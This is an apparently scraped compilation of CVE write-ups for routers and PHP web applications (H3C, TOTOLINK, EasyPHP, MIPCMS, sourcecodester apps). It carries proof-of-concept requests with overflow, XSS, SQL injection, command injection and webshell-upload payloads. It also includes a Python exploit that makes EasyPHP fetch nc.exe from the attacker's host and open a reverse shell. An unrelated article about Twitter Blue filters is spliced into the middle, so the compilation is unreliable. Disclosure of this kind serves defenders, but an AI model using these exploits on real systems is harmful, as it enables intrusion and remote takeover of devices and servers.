H3C GR-1200W MiniGRW1A0V100R006 was discovered to contain a stack overflow via the function set_tftp_upgrad.

Permalink

Cannot retrieve contributors at this time

**Affected product**

    H3C GR-1200W MiniGRW1A0V100R006
    

**Firmware**

     https://www.h3c.com/cn/d_202102/1383837_30005_0.htm
    

In function sub\_4AE06C,the content obtained by the program from the parameter "param" is passed to v2 .Then the v2 is directly copied into the v3 stack through the strcpy function. There is no size check, so there is a stack overflow vulnerability.The attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.

**Detail**

int \_\_fastcall sub\_4AE06C(int a1)
{
  const char \*v2; // \[sp+1Ch\] \[+1Ch\]
  int v3\[8\]; // \[sp+20h\] \[+20h\] BYREF
  char v4\[64\]; // \[sp+40h\] \[+40h\] BYREF

  v3\[0\] = 0;
  v3\[1\] = 0;
  v3\[2\] = 0;
  v3\[3\] = 0;
  v3\[4\] = 0;
  v3\[5\] = 0;
  v3\[6\] = 0;
  v3\[7\] = 0;
  memset(v4, 0, sizeof(v4));
  v2 = (const char \*)sub\_4E58C8(a1, "param", &unk\_4FFD30);
  strcpy((char \*)v3, v2);
  CFG\_Set(0, 507252736, v3);
  if ( atoi((const char \*)v3) )
  {
    if ( atoi((const char \*)v3) == 1 )
      CFG\_Set(0, 520359938, "192.168.1.251;255.255.255.0;VLAN1;2");
  }
  else
  {
    CFG\_Set(0, 520359938, v4);
  }
  return 0;
}

**POC**

POST /goform/aspForm HTTP/1.1
Host: 192.168.0.11:80
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,\*/\*;q\=0.8
Accept\-Language: zh\-CN,zh;q\=0.8,zh\-TW;q\=0.7,zh\-HK;q\=0.5,en\-US;q\=0.3,en;q\=0.2
Accept\-Encoding: gzip, deflate
Referer: https://121.226.152.63:8443/router\_password\_mobile.asp
Content\-Type: application/x\-www\-form\-urlencoded
Content\-Length: 553
Origin: https://192.168.0.124:80
DNT: 1
Connection: close
Cookie: JSESSIONID\=5c31d502
Upgrade\-Insecure\-Requests: 1
Sec\-Fetch\-Dest: document
Sec\-Fetch\-Mode: navigate
Sec\-Fetch\-Site: same\-origin
Sec\-Fetch\-User: ?1

CMD\=set\_tftp\_upgrad&param\=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,;

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2023-29693: fengsha/SetTftpUpgrad.md at main · Stevenbaga/fengsha

H3C GR-1200W MiniGRW1A0V100R006 was discovered to contain a stack overflow via the function version_set.

Permalink

**Affected product**

    H3C GR-1200W  MiniGRW1A0V100R006
    

**Firmware**

    https://www.h3c.com/cn/d_202102/1383837_30005_0.htm
    

In function sub\_4ACC30,the content obtained by the program from the parameter "param" is passed to v2 .Then the v2 is directly copied into the v3 stack through the strcpy function. There is no size check, so there is a stack overflow vulnerability.The attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.

**Detail**

int \_\_fastcall sub\_4ACC30(int a1)
{
  const char \*v2; // \[sp+28h\] \[+28h\]
  int v3\[9\]; // \[sp+2Ch\] \[+2Ch\] BYREF

  v3\[0\] = 0;
  v3\[1\] = 0;
  v3\[2\] = 0;
  v3\[3\] = 0;
  v3\[4\] = 0;
  v3\[5\] = 0;
  v3\[6\] = 0;
  v3\[7\] = 0;
  v2 = (const char \*)sub\_4E58C8(a1, "param", &unk\_4FFD30);
  strcpy((char \*)v3, v2);
  CFG\_Set(0, 505155584, v3);
  return 0;
}

**POC**

POST /goform/aspForm HTTP/1.1
Host: 192.168.0.11:80
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,\*/\*;q\=0.8
Accept\-Language: zh\-CN,zh;q\=0.8,zh\-TW;q\=0.7,zh\-HK;q\=0.5,en\-US;q\=0.3,en;q\=0.2
Accept\-Encoding: gzip, deflate
Referer: https://121.226.152.63:8443/router\_password\_mobile.asp
Content\-Type: application/x\-www\-form\-urlencoded
Content\-Length: 553
Origin: https://192.168.0.124:80
DNT: 1
Connection: close
Cookie: JSESSIONID\=5c31d502
Upgrade\-Insecure\-Requests: 1
Sec\-Fetch\-Dest: document
Sec\-Fetch\-Mode: navigate
Sec\-Fetch\-Site: same\-origin
Sec\-Fetch\-User: ?1

CMD\=version\_set&param\=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,;

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2023-29696: fengsha/aVersionSet.md at main · Stevenbaga/fengsha

Cross Site Scripting (XSS) vulnerability in MIPCMS 3.6.0 allows attackers to execute arbitrary code via the category name field to categoryEdit.

1.After the administrator logged in, open the following page:  
  
http://127.0.0.1/?s=/admin/article/articleCategory/  
  
2.click 'modify'  
3.fill payload in Category Name :  
  
"><imG/src=1 onerror=alert(1)>  
  
4.save  
5.The request package :  
  
POST /?s=/article/ApiAdminArticle/categoryEdit HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0  
Accept: application/json, text/plain, _/_  
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3  
Referer: http://127.0.0.1/?s=/admin/article/articleCategory/  
Content-Type: application/json;charset=utf-8  
access-key: cFaLOmUGoz9URROtxaAqe37vHSlI0LL3  
terminal: pc  
uid: 9afb4393b6cddbeb7418ab77  
access-token: 06cdb3c844508158ebb7483c221c9e63  
Content-Length: 324  
Cookie: security_level=0; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1549460630; Hm_lvt_3155433929be1afd6cef849b9709d4d7=1553359007; lang_type=zh-CN; bdshare_firstime=1549546719595; wp-settings-time-1=1551345212; PHPSESSID=65unerfghovped0ap7eokcrdi3; admin_id=1; admin_level=1; admin_name=admin; admin_secret=8b99f316efb80526f2434ded92036bff; Hm_lpvt_3155433929be1afd6cef849b9709d4d7=1553359007  
DNT: 1  
Connection: close

{"id":1,"pid":0,"name":""><imG/src=1 onerror=alert(1)>","url_name":"123","seo_title":"","template":"article.html","detail_template":"articleDetail.html","category_url":"/article/<url_name>/","category_page_url":"<category_url>index_.html","detail_url":"/article/.html","description":"","keywords":"","content":""}  

6.open the url it will trigger:  
  
http://127.0.0.1/index.php?s=/article/123/

CVE-2020-18132: There is a Store XSS in Administrator Pannel · Issue #4 · sansanyun/mipcms

Judging Management System v1.0 is vulnerable to SQL Injection. via /php-jms/review_se_result.php?mainevent_id=.

Permalink

Cannot retrieve contributors at this time

**Judging Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Prohibit-404

vendors: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-jms/review\_se\_result.php?mainevent\_id=

Vulnerability location: /php-jms/review\_se\_result.php?mainevent\_id=, mainevent\_id

dbname =jms\_db

\[+\] Payload: /php-jms/review\_se\_result.php?mainevent\_id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place --->

GET /php\-jms/review\_se\_result.php?mainevent\_id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=f6bhcgo222sk31fnm99nf9tjt1
Connection: close

CVE-2023-30018: bug_report/SQLi-1.md at main · 10F26/bug_report

A  few simple tools can help filter out most Twitter Blue users (but still see the ones you like).

I'm not here to judge anyone who pays for Twitter Blue. However, I'm not a fan of pay-to-win mechanics. At this point, Twitter is a game where players compete for the most attention; Twitter Blue is overpowered DLC. If you buy a subscription, your tweets are shown at the top of comment threads and prioritized in other contexts, including the “For You” page. This makes Blue the social media equivalent of paying for unlimited ammo or improved body armor, regardless of who you are or whether what you have to say is worth promoting.

It also makes Twitter really annoying to use. No one wants to play with the people who are paying to win. That's why there's so much mockery of, and desire to avoid, Twitter Blue users.

Granted, there are plenty of reasons why longtime Twitter power users—in particular, public figures or people who historically have trouble with impersonators—might pay for Twitter Blue. No one wants to lose an audience they worked hard to build, and Twitter has the right to monetize itself however it likes. You also have the right to consume (or not consume) the social media you choose.

All the same, it can't be denied that a lot of really annoying posts from Twitter Blue users with low follower counts show up in all kinds of contexts. If you don't want to see those posts, I don't blame you, and here's how you can filter them all out:

Blue Lite Blocker

Twitter via Justin Pot

BlueLiteBlocker is a free, open-source browser extension for Chrome and Firefox that can filter comments from Twitter Blue subscribers out of your Twitter timeline. You can install the extension and then use Twitter the way you normally do. All comments from Twitter Blue users will be obscured—you can click “View” if you are absolutely certain you want to see them.

Unlike some extensions (BluesBlocker, for example, or Twitter Blue Blocker), Blue Lite Blocker doesn't affect anyone that you actively follow, meaning it won't accidentally filter out your friends. The extension also allows you to still see the tweets from Twitter Blue users that have a certain number of followers—the default threshold is 100,000, but you can set it to whatever you want.

Twitter via Justin Pot

These two features make Blue Lite Blocker the perfect compromise. It filters out the annoying Twitter Blue users while not affecting the people you care about and the public figures whose posts you might want to see. If there's a Twitter Blue user with a lot of followers who you don't want to see, you can block or mute them manually.

Other Workarounds to Clean Up Twitter

Blue Lite Blocker isn't a perfect solution. It requires a browser extension, which not everyone is going to like, and it doesn’t help on mobile (not that there’s much help on mobile anyway). There are a few alternatives, though.

Twitter via Justin Pot

The first is to make sure you're using the Following tab instead of For You. This tab is just tweets from the people you follow, so it doesn't artificially favor Twitter Blue subscribers. You could also try blocking all retweets if you want to clean things up a little more.

If that's not enough, you could try TweetDeck, the power user's version of Twitter. This tool doesn't have a For You page or any algorithmic sorting, meaning Twitter Blue users aren't artificially boosted on it. TweetDeck is the one part of Twitter that's completely untouched by the recent changes there, and I hope this doesn't change. (So please, no one tell Elon Musk that TweetDeck still exists.)

Another cool extension, if you miss seeing legacy checkmarks, is Eight Dollars. Right now blue checkmarks only show up if someone is paying for Blue, meaning most people who had a checkmark prior to April 20, 2023 no longer have one. Eight Dollars can show you which users were verified before legacy verified checkmarks were removed, which is useful if you trusted the old system.

There's a cat and mouse element to all of this, of course. Twitter's current regime really, really wants to turn Blue checkmarks into sellable status symbols and any tool that diminishes the visibility of Blue subscribers cuts against that goal. They're going to try to find a way to break this, and all similar, tools. For now, though, they work—use them while you can. 

Or you could just abandon your Twitter account, set up a public archive of your tweets, and learn how to get started on Mastodon or Bluesky. Up to you.

Your Twitter Feed Sucks Now. These Free Add-Ons Can Help

EasyPHP Webserver version 14.1 suffers from remote code execution and path traversal vulnerabilities.

# Exploit Title: EasyPHP Webserver 14.1 - Multiple Vulnerabilities (RCE and  
Path Traversal)  
# Discovery by: Rafael Pedrero  
# Discovery Date: 2022-02-06  
# Vendor Homepage: https://www.easyphp.org/  
# Software Link : https://www.easyphp.org/  
# Tested Version: 14.1  
# Tested on:  Windows 7 and 10

# Vulnerability Type: Remote Command Execution (RCE)

CVSS v3: 9.8  
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H  
CWE: CWE-78

Vulnerability description: There is an OS Command Injection in EasyPHP  
Webserver 14.1 that allows an attacker to achieve Remote Code Execution  
(RCE) with administrative privileges.

Proof of concept:

To detect:

POST http://127.0.0.1:10000/index.php?zone=settings HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)  
Gecko/20100101 Firefox/70.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 28  
Origin: http://127.0.0.1:10000  
Connection: keep-alive  
Referer: http://127.0.0.1:10000/index.php?zone=settings  
Host: 127.0.0.1:10000

app_service_control=calc.exe

The calculator opens.

Exploit:

# !/usr/bin/python3  
import requests  
import sys

if len(sys.argv) != 5:  
    print("RCE: EasyPHP Webserver 14.1 and before - by Rafa")  
    print("Usage:   %s <TARGET> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT>" %  
sys.argv[0])  
    print("Example:   %s 192.168.1.10 10000 192.168.1.11 9001" %  
sys.argv[0])  
    exit(1)

else:  
    target = sys.argv[1]  
    targetport = sys.argv[2]  
    localip = sys.argv[3]  
    localport = sys.argv[4]  
    # python3 -m http.server / python2 -m SimpleHTTPServer with nc.exe in  
the directory

    payload =  
"powershell+-command+\"((new-object+System.Net.WebClient).DownloadFile('http://"  
+ localip + ':8000' +  
"/nc.exe','%TEMP%\\nc.exe'))\";\"c:\windows\\system32\\cmd.exe+/c+%TEMP%\\nc.exe+"  
+ localip + "+" + localport + "+-e+cmd.exe\""  
    print (payload)  
    url = 'http://' + target + ':' + targetport + '/index.php?zone=settings'  
    headers = {  
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4433.0 Safari/537.36"  
    }  
    data = {'app_service_control':payload}

    try:  
        r = requests.post(url, headers=headers, data=data)  
    except requests.exceptions.ReadTimeout:  
        print("The payload has been sent. Check it!")  
        pass

# Vulnerability Type: Path Traversal

CVSS v3: 6.5  
CVSS vector: 3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N  
CWE: CWE-22

Vulnerability description: An issue was discovered in EasyPHP Webserver  
14.1. An Absolute Path Traversal vulnerability in / allows remote users to  
bypass intended SecurityManager restrictions and download any file if you  
have adequate permissions outside the documentroot configured on the server.

Proof of concept:

GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini  
HTTP/1.1  
Host: 192.168.X.X:10000  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML,  
like Gecko) Chrome/41.0.2228.0 Safari/537.21  
Accept: */*

HTTP/1.1 200 OK  
Host: 192.168.X.X:10000  
Connection: close  
Content-Type: application/octet-stream  
Content-Length: 499

; for 16-bit app support [fonts] [extensions] [mci extensions] [files]  
[Mail] MAPI=1 CMCDLLNAME32=mapi32.dll CMCDLLNAME=mapi.dll CMC=1 MAPIX=1  
MAPIXVER=1.0.0.1 OLEMessaging=1 [MCI Extensions.BAK] 3g2=MPEGVideo  
3gp=MPEGVideo 3gp2=MPEGVideo 3gpp=MPEGVideo aac=MPEGVideo adt=MPEGVideo  
adts=MPEGVideo m2t=MPEGVideo m2ts=MPEGVideo m2v=MPEGVideo m4a=MPEGVideo  
m4v=MPEGVideo mod=MPEGVideo mov=MPEGVideo mp4=MPEGVideo mp4v=MPEGVideo  
mts=MPEGVideo ts=MPEGVideo tts=MPEGVideo

EasyPHP Webserver 14.1 Path Traversal / Remote Code Execution

TOTOLINK X5000R V9.1.0u.6118_B20201102 and V9.1.0u.6369_B20230113 contain a command insertion vulnerability in setting/setTracerouteCfg. This vulnerability allows an attacker to execute arbitrary commands through the "command" parameter.

TOTOLINK X5000R (V9.1.0u.6369\_B20230113)was found to contain a command insertion vulnerability in setting/setTracerouteCfg.This vulnerability allows an attacker to execute arbitrary commands through the "command" parameter.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.3.2
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 82
    Origin: http://192.168.3.2
    Connection: close
    Referer: http://192.168.3.2/advance/traceroute.html?time=1679125513355
    Cookie: SESSION_ID=2:1679122532:2
    
    {"command":"127.0.0.1; pwd > /tmp/1.txt;","num":"4","topicurl":"setTracerouteCfg"}
    

Finally, you can write exp to get a stable root shell without authorization.

CVE-2023-30013: vuln/TOTOLINK/X5000R/2 at main · Kazamayc/vuln

An arbitrary file upload vulnerability in the component /admin/ajax.php?action=save_menu of Online Food Ordering System v2.0 allows attackers to execute arbitrary code via uploading a crafted PHP file.

Permalink

Cannot retrieve contributors at this time

**Online Food Ordering System v2.0 by oretnom23 has arbitrary code execution (RCE)**

BUG\_Author: xtxxueyan

vendors: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability url: ip/fos/admin/ajax.php?action=save\_menu

Loophole location: Judging Management System's "/fos/admin/ajax.php?action=save\_menu" file exists arbitrary file upload (RCE)

Request package for file upload：

POST /fos/admin/ajax.php?action\=save\_menu HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/fos/admin/index.php?page=menu
Content-Length: 808
Content-Type: multipart/form-data; boundary=---------------------------11146509511477
Cookie: PHPSESSID=iuka6rklteufkt7v952vs2g4eq
Connection: close
\-----------------------------11146509511477
Content-Disposition: form-data; name="id"
\-----------------------------11146509511477
Content-Disposition: form-data; name="name"
11
\-----------------------------11146509511477
Content-Disposition: form-data; name="description"
1
\-----------------------------11146509511477
Content-Disposition: form-data; name="status"
on
\-----------------------------11146509511477
Content-Disposition: form-data; name="category\_id"
1
\-----------------------------11146509511477
Content-Disposition: form-data; name="price"
111
\-----------------------------11146509511477
Content-Disposition: form-data; name="img"; filename="shell.php"
Content-Type: application/octet-stream
<?php phpinfo();?>
\-----------------------------11146509511477--

The files will be uploaded to this directory \\fos\\assets\\img 

We visited the directory of the file in the browser and found that the code had been executed

CVE-2023-30122: bug_report/RCE-1.md at main · xtxxueyan/bug_report

Judging Management System v1.0 was discovered to contain a SQL injection vulnerability via the event_id parameter at /php-jms/result_sheet.php.

**Judging Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: M1st

vendors: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-jms/result\_sheet.php?event\_id=

Vulnerability location: /php-jms/result\_sheet.php?event\_id=, event\_id

dbname =jms\_db

\[+\] Payload: /php-jms/result\_sheet.php?event\_id=-1%27%20union%20select%201,2,3,database(),5,6,7,8,9,10,11--+ // Leak place ---> event\_id

GET /php\-jms/result\_sheet.php?event\_id\=\-1%27%20union%20select%201,2,3,database(),5,6,7,8,9,10,11\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=f6bhcgo222sk31fnm99nf9tjt1
Connection: close

CVE-2023-30203: bug_report/SQLi-2.md at main · debug601/bug_report

Judging Management System v1.0 by oretnom23 was discovered to vulnerable to SQL injection via /php-jms/review_result.php?mainevent_id=, mainevent_id.

**Judging Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-jms/review\_result.php?mainevent\_id=

Vulnerability location: /php-jms/review\_result.php?mainevent\_id=, mainevent\_id

dbname =jms\_db

\[+\] Payload: /php-jms/review\_result.php?mainevent\_id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+// Leak place ---> mainevent\_id

​sql GET /php-jms/review_result.php?mainevent_id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ HTTP/1.1 Host: 192.168.1.88 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Cookie: PHPSESSID=f6bhcgo222sk31fnm99nf9tjt1 Connection: close ​

Tag

#firefox